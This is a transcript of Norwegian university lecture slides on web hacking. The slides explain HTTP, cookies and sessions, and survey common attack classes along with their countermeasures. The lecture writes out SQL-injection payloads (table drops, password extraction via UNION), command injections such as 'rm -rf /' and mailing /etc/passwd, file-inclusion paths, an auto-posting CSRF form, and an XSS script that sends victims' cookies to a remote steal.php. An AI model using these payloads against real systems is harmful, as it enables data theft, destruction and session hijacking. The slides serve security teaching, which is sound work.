Sikkerhet og Hacking. Forelesning 2 Hacking av nettsider. Tom Heine Nätt

Transkript

1 Sikkerhet og Hacking Forelesning 2 Hacking av nettsider Tom Heine Nätt

2 Dagens forelesning Viktigste er å forstå hva som går å gjøre, ikke hvordan Selv om hvordan er en bonus

3 Hva må en webhacker vite om webben?

4 Hva må en hacker vite om webben? Internet er ikke kun IRC, mail, FTP, Torrents osv.. De viktige spesifikasjonene: HTML (/CSS) JavaScript URL (/URI) HTTP(/HTTPS) PHP(/Python) Hvordan teknologien fungerer i detalj Hvordan manuelt utfører de operasjonene som programvaren vanligvis gjør

5 Kilder: RFC-dokumenter De fleste standarder for nettet Protokoller Fremgangsmåter Teknologier Osv.. Spesielt: F.eks: HTTP: URL:

6 Kilder: W3C World Wide Web Consortium HTML5: Javascript

7 Manualsider PHP: Python:

8 Webteknologier I kortform

9 HTML Websiders struktur Websiders innhold Aktive elementer (form-tags) Referanser til andre elementer Bilder, video, flash CSS JavaScript Osv Metatags: l

10 URL Uniform Resource Locator Forteller hvor en ressurs er Syntax: i/filnavn For eksempel: html ftp:// Schemes: http, https, gopher, ftp, news, mailto, telnet, file osv

11 URL forts. - Parametere Kan også inneholde parametere Legg til:?param1=verdi1&param2=verdi2 F.eks: a&rls=org.mozilla%3aen- US%3Aofficial&hs=vqd&q=hiof&btnG=S%C3%B8k& meta= URL encoding: Maskere ugyldige tegn i en url slik som: Space => %20 / =>%2F & => %26? => %3F Osv

12 HTTP Overføringsprotokollen Nettleseren er den aktive parten En tekst -protokoll (line oriented) To forespørsel -formater GET Data sendes gjennom URL POST Data sendes i forespørselspakken Regel: POST dersom det å laste siden har en Bi-effekt som f.eks registrering Ett svarformat RESPONSE Stateless (ikke forbindelsesorientert) Alt er separate forespørsler (f.eks alle bilder)

13 HTTP GET GET /index.html HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-us; rv: ) Gecko/ Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q =0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer:

14 HTTP POST POST /index.html HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-us; rv: ) Gecko/ Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q =0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: Content-Type: application/x-www-formurlencoded Content-Length: 25 usern=olan&passwd=drossap

15 HTTP - RESPONSE HTTP/1.x 200 OK Date: Wed, 28 Jan :40:30 GMT Server: Apache/2.2.3 (Debian) PHP/ etch13 Last-Modified: Sat, 24 Jan :02:05 GMT Etag: "581e8-2a8-f350d140" Accept-Ranges: bytes Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso Content-Length: 680 <html> <head>.. </html>

16 Verktøy for manuell HTTP Telnet: telnet 80 GET /index.html HTTP/1.1 Host: MERK alle de underlige headerfeltene hos VG 301-svar GET /index.php HTTP/1.1 Host: Firefox: LiveHeaders

17 HTTP Interessante detaljer Referer (GET/POST) (Feilstavet ) Forteller hvor brukeren kommer i fra Google: søkeord i parameter Brukes ofte som en kontroll Dumt som vi skal se Sikkerhetshull (hvor kom du fra med hvilke parametere) Response-codes 200, 301, 404, 500

18 HTTPS Enkel forklaring: HTTP over en kryptert kanal Beskytter KUN overføringen av data/headers og mot man-in-the-middle attacks. Følgende skritt foretas: Server/Klient blir enige om krypteringsalgoritme Klienten validerer serverens sertifikat (Serveren validerer klienten) Gjøres (for) sjelden Blir enige om nøkkel

19 HTTPS-ulemper Brukeren! Gidder ikke bry seg om ugyldige sertifikater Vet ikke hva https-betyr, og kontrollerer det ikke Gir falsk trygghet Mot f.eks phishing-sider Er signeringen av sertifikatet riktig? Et system som er hacket

20 Domenenavn og IP-Adresser

21 Domenenavn og IP-adresser DNS-servere står for oversettelsen 1. Vi taster nettadresse 2. Maskinen kontakter sin oppgitte(!!!) DNS 3. DNS svarer med Ip-adresse / ping Hva om vi klarte å endre brukerens default DNS??? Rutere Windows/Mac/Linux Setting Både DHCP/manuell er farlig

22 Modifisere webforespørsler Proxyservere/FirefoxTamper

23 Proxyservere Brukes som oftest til delte cacher Alle forespørsler går gjennom proxyen Vi kan endre forespørslene før de går videre Forespørslene kan logges Typisk programvare PenProxy Startes: java -jar penproxy.jar 8088 Hva om vi setter opp en proxy i innstillingene til en annens maskin? Via virus, fake tutorials eller social engineering Eksempel: Skjult proxy (PenProxy)

24 Firefox Tamper Plugin til firefox Kan endre all headerinformasjon som sendes ut Eksempel

25 Cookies/Sessions

26 Cookies Informasjonskapseler Lagres på brukerens maskin (OBS!) Holder informasjon over flere sider /fra gang til gang Benyttes til: Hvilke annonser er sett Brukerinnstillinger på websider (farge, skriftstørrelse) Spore brukeren rundt på siden Handlekurver SessionID Osv I utgangspunktet kun samme webserver (OBS!) Om ikke path/domain er satt til noe annet Eksempel: Firefox View Cookies på

27 Cookies GET /index.html HTTP/1.1 Host: HTTP/ OK Content-type: text/html Set-Cookie: sessionid=aadd556ff GET /index2.html HTTP/1.1 Host: Cookie: sessionid=aadd556ff.

28 Cookie Set-Cookie finnes i mer avanserte former: Set-Cookie: sessionid=aadd556ff; expires=fri, 01-Jan :59:59 GMT; path=/; domain=.hiof.no HTTPOnly attributten path=/; domain=.hiof.no; HTTPOnly Hindrer f.eks Javascript uthenting

29 Sessions Kort fortalt: Serveren tildeler alle brukere en temporær ID Serveren lagrer data for en bruker med en viss ID ID en lagres som en cookie hos brukeren Hver forespørsel identifiseres av ID en som er lagret hos brukeren

30 Session hijacking Man tar over en annen brukers session ved å angi denne brukerens ID som sin egen.. Hvordan få ID? Snappe opp Proxyserver Pakkesniffing Referer-headeren Stjele Lese cookie-filene fra disk Cross Site scripting Gjette Om for eksempel id lages av brukernavn osv.. Eksempel: Bruktbutikk + Firefox Tamper

31 Session hijacking Firesheep: Deprecated

32 Session hijacking - mottiltak Serveren husker brukers IP Problemer om IP endres ofte Ha en ekstra kontroll på f.eks User- Agent Hvor lenge skal sesjonene være åpne? Blir sesjons-id en generert random, eller basert på brukerinfo osv? Tvinge HTTPS

33 Hvorfor er nettet så sårbart? Hva tror dere?

34 Hvorfor er nettet så sårbart? Gammel teknologi Nye bruksområder Nye brukere Alt flyttes over på web Tjenester Personlig data Applikasjoner Mange hobbyprogrammerere Finner eksempelkode som ikke fokuserer på sikkerhet, men enkelhet Fornøyd når det funker Alle har tilgang Få forstår det som ligger bak Klarer ikke jeg, klarer ikke andre Sikkerhet er en merkostnad i utvikling

35 Hvorfor er nettet sårbart? Feiler en webserver, kan den risikere å vise koden Mange kjente feller å gå i Include Opplastning gjestebok Osv.. Glemmer å skille på client-side(usikker) og server-side(sikker) Alt nettleseren kan gjøre, kan man også gjøre manuelt (med endringer)

36 Hvorfor er nettet så sårbart Masse teite ideer for publisering Løpende artikkelnummer Lett å skrape informasjon Gjettbare URL er medlems-sider gjennom å f.eks slenge på /member Brukerspesifike løsninger =534534

37 Brukerinput

38 Brukerinput Whitelisting vs. Blacklisting Hvor havner de tegnene vi ikke har tenkt på Whitelisting: lett å glemme noe som burde vært lov (JFR: Nätt) Blacklisting: mer arbeid på forhånd, samt blir sjelden oppdatert raskt nok med nye farer som oppdages Hva er best? Usergenerated (inputfelter osv.) og servergenerated (cookies, headerfield osv.) Manipulasjon av servergenerated er helt klart hacking Ikke gi noen feilmelding osv for disse (kun hendelsen er logget ) Ikke gjør brukerens input gyldig, dersom den inneholder feil

39 Brukerinput Validering Mangel på validering som gir hackere muligheter Teknologier som regexp hindre mye F.eks vil da aldri telefonnummer forårsake SQL-injections Husk at input er mer enn tekst Coockies Hidden fields Metadata i requests osv.. Mange former for validering Tegn Verdier (domain) Lengde (smart triks..) Gjør inputkontrollen FØRST! NB! Client-side validering!!! Greit for feilmeldinger, men ikke som sperre.

40 Eksempler på gal input Bestille negativt antall varer Fradato før tildato Osv

41 Data til undersystemer Stringer som sendes mellom systemer Tolkes som noe annet enn tekst i ett av systemene Fra bokstaver til kontrolltegn/metadata Problemet er når brukeren kan manipulere disse strengene

42 Data til undersystemer Flere teknikker Parametermanipulasjon SQL-injections Command-inejctions Cross-site scripting Osv..

43 Parametermanipulasjon

44 Parametermanipulasjon GET-request mellom sider Ofte uskyldige data i utgangspuntket Vi kan gå inn å endre parameterne i URL en Mange sider leser kun REQUEST Altså skiller ikke på POST og GET Kan benyttes til: Lure andre Lure systemet

45 Parametermanipulasjon: Google hl=no&q=hiof&btng=googles%c3%b8k&meta=&aq=f&oq= hl-verdier: fr en xx-elmer xx-klingon osv..

46 Parametermanipulasjon: SA-været longitude=11.11&latitude=59.28&moh=50

47 Parametermanipulasjon Andre eksempler Hiofs-publiseringssystem Canadiske passsystemet Guinness Alle former for overføring av info mellom sider Registreringsystem Nettbutikker Popupvinduer

48 SQL-Injection

49 SQL-Injections Problemet: SQL er tekststrenger i programmering Bygges sammen, og sendes til DB.. Tenk: INSERT INTO Test VALUES( Per ); INSERT INTO Test VALUES( Per s bakeri );

50 Typisk Kode <?php $fornavn=$_get["fornavn"]; $etternavn=$_get["etternavn"]; $sql = "INSERT INTO Test VALUES('".$fornavn."','".$etternavn."')"; mysql_query($sql,$con);?>

51 SQL-Injection Eksempel 1 Turid SELECT kolonne FROM tabell WHERE kolonne2=' '; '; DELETE FROM tabell WHERE kolonne2!= ' sokesql.php

52 SQL-Injection Eksempel 2 per test SELECT * FROM user WHERE username= ' AND password=' '; per -- ' OR ''=' per OR 1 = 2 Altså En setning to svakhter (Husk AND har høyere presedens enn OR) loginsql.php

53 SQL-Injection Eksempel 3 45 SELECT * FROM Bruker WHERE ID = 45; DROP TABLE Bruker

54 SQL-Injection Eksempel 4 SELECT id, produktnavn, pris FROM Produkt WHERE ID = UNION SELECT 0, brukernavn, passord FROM Login Typisk: $_GET[ varenummer ]

55 SQL-Injection Eksempel 5 SELECT id, produktnavn, pris FROM Produkt WHERE ID = 45 45; UPDATE Produkt SET produktnavn = (SELECT passord FROM Kunde WHERE brukernavn= olehansen ) WHERE id=45

56 SQL-Injection Eksempel 6 SELECT id, produktnavn, pris FROM Produkt WHERE ID = 45 45; SHUTDOWN

57 SQL-Injection Vi kan også benytte tegnkoder for databasen Overses ofte av filtreringer i programmeringsspråket F.eks: Char(39) => ' 0x27 => '

58 SQL-Injections Hvordan kjenne strukturen på spørringen Gjettinger/resonement Fremprovosere feilmeldinger F.eks: ugyldige injection -forsøk Om man er heldig vises hele kodelinja med SELECT-setningen HAVING/GROUP BY trikset Vil avsløre kolonnenavn Brute Force Få tak i kildekoden

59 SQL-Injections Hvordan forhindre: Benytte lagrede prosedyrer Sende variabler(med typer), istedenfor tekst til DB Prepared statements SELECT * FROM Kunde WHERE name=? Escape farlige tegn F.eks ' blir til \' eller '' Blacklisting vs. Whitelisting Sette rettigheter Ingen av disse er 100% sikre Alle prog. språk/db har sine feil Fort gjort å stole helt på dette

60

61 Sikkerhet og DB Vær ytterst forsiktig med å ha db-brukerinfo i kildekoden Andre autentiseringskilder Bruke data fra innlogging Sertifikater Tjenesteserver Skjulte "inc-filer" utenfor htdocs.. La mest mulig av prosesseringen foregå i DBMS Prosedyrer SQL-prosessering (hent ut minst mulig data ) Pass på serverscript... Kan komme i gale hender ved serverfeil.. Unngå "sqlzoo.net"-bokser Utfør aldri DB-administrative oppgaver direkte fra applikasjon Skjul mest mulig spor av db i feilmeldinger og resultater

62 Command Injection

63 Command Injection Tilsvarende som SQL-Injection, men at vi kjører systemkommandoer i webscriptene F.eks: *.txt echo `ls `; *.txt; rm rf /

64 Command Injection 10 echo `cal `; 10; sendmail < /etc/passwd; 10; cat adjø > /var/log/apache2/access_log

65 Filopplasting

66 Filopplasting Om filene senere presenteres på websiden.. Hva med: Å laste opp minfil.php (minfil.php%00.jpg) Eksempel: filopplasting.html

67 Inkludering av filer

68 Inkludering av filer Typisk: index.php?side=test.php index.php?side=/etc/passwd Fare for at brukeren kan få Se systemfiler Se programkoden Uendelig mange måter å lure slike script på om man ikke har en whitelist-chek F.eks %00-tegnet eller \0 (null-byte) Eksempel: include1.php, include2.php, include3.php

69 Cross-site scripting (XSS)

70 XSS-eksempel guestbook.php/artikel.php

71 Cross-site scripting (XSS) Baserer seg på websider der bruker skriver inn data, som senere presenteres på en webside Gjestebøker Blogger (kommentarfelt) Annonsemarked Nettleksikon Mer riktig definisjon: Lure en webside til å vise utvalgte HTML-koder Evt URL-parametere Baserer seg på at (HTML/)JavaScript er tekst Og alt for mange måter å skrive JS-kode på

72 XSS Benyttes til Vise uheldig data Endre data som vises Stjele cookies fra brukerne Session hijacking Utnytte sikkerhetshull i nettlesere Endre hvor forms sender data Osv

73 XSS Vanlig kode <!-- (skjuler resten av innleggene osv) <script>window.open( ) </script> Legg til: for(i=0;i<1000;i++) <script>document.location.replace( url )</script> <script>document.body.innerhtml.replace( noe, noe annet )</script> F.eks kontonummeret på siden til et firma

74 XSS Hvordan skjule <script src= ><script> </script><q q= Dersom: <input type= text value= > <sc<script>ript>.</sc</script>ript> Dersom noen filtrerer for <script> +ADW-script+AD4- +ADW-/script+AD4- Ascii/unicode fare Viktig å angi tegnsette i meta-taggen Se for flere/andre..

75 XSS Session hijacking document.location.replace( om/test.php?info= + document.cookie); Eksempel: bruktmarked Her kan man redirecte tilbake igjen til riktig side, samt sette en cookie som gjør at man ikke blir redirected i en uendelig løkke Hva om vi gjør dette i en IFrame?

76 XSS Session hijacking <script type="text/javascript"> if(document.cookie.indexof("abc")< 0) { document.cookie = "abc=1"; document.location.replace(" com/steal.php?id="+document.cookie+"&ref="+docum ent.location); } </script>

77 Måter å skrive JavaScript på <script> </script> <a href= javascript: > Også for <img src= > <body onload= > onclick, ondbclick,onmousedown, onkeypress osv.. + mange flere browserpesifike

78 XSS og URL -parametere Dersom en url-parameter vises på en webside. Tom%20Heine<script>osv..</script> Krever at vi lurer brukeren å gå inn på den bestemte URL en.. Eksempel: greeting.php F.eks endre søkeresultater i et telefonkatalogoppslag

79 XSS og Mail Alle nyere web-mailklienter leser HTML-mail Og er derfor utsatt for XSS

80 XSS - mottiltak Filtrere bort alle farlige tegn (html encoding/entities): & => & => " < => < > => > => &#39; Uansett nyttig.. Ikke bare for XSS tenk brukerinput med f.eks: > Filtrere bort enkelte tagger Omtrent umulig å få riktig/tenke på alle muligheter Uendelig mange variasjoner på skrivemåter nettelsere er for snille Benytte ferdige editorer som gjør jobben Benytte funksjone ri prog-språk: f.eks htmlentities, mysql_real_escape_string Skru av JS i nettleser umulig løsning Kan være en idee å også filtrere under output For å være sikker på å få med alt Etter prossesering

81 Manipulasjon av websider FireBug

82 Firebug Legge til valg i lister Fjerne/disable Javascript kontroller Legge til/endre hidden -felter

83 Firebug-eksempler/server generert data F.eks kontooversikt... <form action= vis.php metohd= get > Konto: <select name= konto > <option value= >Konto 1</option> <option value= >Konto 2</option> </select> </form> Eksempel: regskjema.php

84 Logging

85 Logging Alt man gjør logges Ofte usikkerhetsmomentet ved et angrep Er den angrepnes beste Bevis Metode for å tette hull Metode for å oppdage angrepet MEN: Får man tilgang til loggfilene, kan de bli nyttig verktøy Prøve noe, se på resultat

86 DoS-angrep

87 DoS angrep For mange forespørsler For mye data F.eks laste opp kjempefil Forespørsler som setter i gang kompliserte operasjoner ugyldige verdier Utnytte feil i programkode Evige løkker Forespørsler som er umulige å skille fra ekte

88 Web-Trojaner

89 Web-Trojaner Også kjent som CSRF /XSRF Cross-site request forgery Lure noen inn på en webside ( med visse parametere satt) spoofing, XSS, Phishing osv. Spesielt nyttig når en bruker alt er innlogget på en tjeneste Evt. En remember me -sak Eksempler på bruk: Lure til kjøp av aksjer NHY.OL &amount=40000&pric e=100 Lure noen til å legge deg til som facebookvenn (ikke autentisk) Poste på din facebook-side er en gjøk (ikke autentisk) Linkene kan også se vennlige ut, men med redirect Et nytt kjempeproblem!

90 Web-Trojaner - Hvordan Via GET-URL Kan være en normal URL med redirect til f.eks Via Autopost-form-sider (POST) <form name= test action= method= post > <input type= hidden name= param value= > </form> <script> document.getelementbyid( test ).submit()</script>

91 Web-Trojanere - Løsninger Eksempel: autopost.html/ kulside.html Eksempel: CSRF-hiof (web/index.php) Mottiltak: Bekreftelse med passord/passordkalkulatorer Captchas Ticket/FormID-løsninger Men: Frame-løsninger (en for virkelige siden, en med fakesiden og samme id)

92 Flash-animasjoner

93 Flashanimasjoner Flash-animasjoner kaller ofte skjulte URL er med artige parametere Annen type programmerere Tenker at dette er jo hemmelig fordi binært Highscore: sethighscore.php?name=thn&score=5600 Mottiltak Generere med en hemmelig sjekksum/passord basert på navn/score sethighscore.php?name=thn&score=5600&check=ae343 2DDF32 Julekalender: f.no&luke=14 Finner format ved wiretapping

94 Automatisk skraping

95 Automatisk skraping Man kan lett tømme en website for informasjon via programvare som skraper all data Eksempel: vgnet.php Eksempel: Tele2-saken

96 Finne skjulte data Robots.txt Disallow Nummererte artikler Google-søk med site:

97 Bakveien

98 Bakveien De aller fleste websider kan nåes via FTP og SSH FTP (ikke SFTP) sender passord i klartekst Kommer vi inn her, kan vi både se og modifisere kode

99 Andre triks

100 Andre triks Rekkefølge som f.eks REQUEST søker i Hva om GET før POST? PHP sin autovariabelmapping Eksempel: register_globals.php Kun om server er satt opp rart Ikke på hiof

101 Andre triks Link-CSS JS: getcomputedstyle() <= Avslører history Se etter kommentarer i HTMLkildekoden Mange kommenterer f.eks PHP med <!- -og -->

102 Andre triks - hidden-feltet Inputvalidering på første side så hidden-felter på videre sider Data er innom brukeren flere ganger, men valideres ofte bare første gang Typisk: Bestillingssider Edit-sider ID som skal oppdateres er et hidden field..

103 Andre triks God samleside med Firefox-utvidelser for hackere Web+Application+Assault+Kit Lost password Sender passord i klartekst via mail Passordinnlogging: DoS-angrep: Bruk opp alle 3 forsøk på alle brukere Alt for mange sider autentiserer bare tilgang på form en, og ikke det som sendes inn Vi kan derfor lage vår egen form og sende inn data uten å egentlig ha tilgang, om vi vet hvordan formen ser ut

104 Andre triks GET-URL er som er sendt over HTTP er synlig i Historikken Logger Routere ISP Wiretapping Osv.. Obs: Hemmelig data i GET-requests (f.eks session ID) Synelig som Referer-metadata på neste side.. OBS!!!! Derfor: Aldri gå fra en sikker til en usikker side direkte!

105 Andre triks Mange benytter encoding som encryption.. F.eks BASE64, ROT13 Sikker side, som sender opplysningene til deg som mail etterpå Websider viser ofte ukjente filformater som tekst Sikkerhetshull i Webserverne

106 CMS-systemer

107 CMS-systemer Baserer seg på?id=4844 prinsippet Mye brukt = kjente exploits Standardkontoer Hackingangrep = bakdører 3.parts plugins

108 Sikker kode

109 Hvordan skrive sikker kode Ikke tro at ingen kan hacke, fordi det bak er skjult F.eks tabellnavn, filstruktur osv Aldri dupliser kode Benytt funksjoner Isoler funksjonalitet Benytt funksjoner Skriv forstårlig/enkel kode Benytt funksjoner Kommenter kode Eller skriv selvforklarende kode Lær deg programmeringsspråkets særegenheter.. Vær flink til å logge hendelser med mye info

110 Til neste gang (18/2) Prosjekt 2 Les Art of Deception -boka Samle på SPAM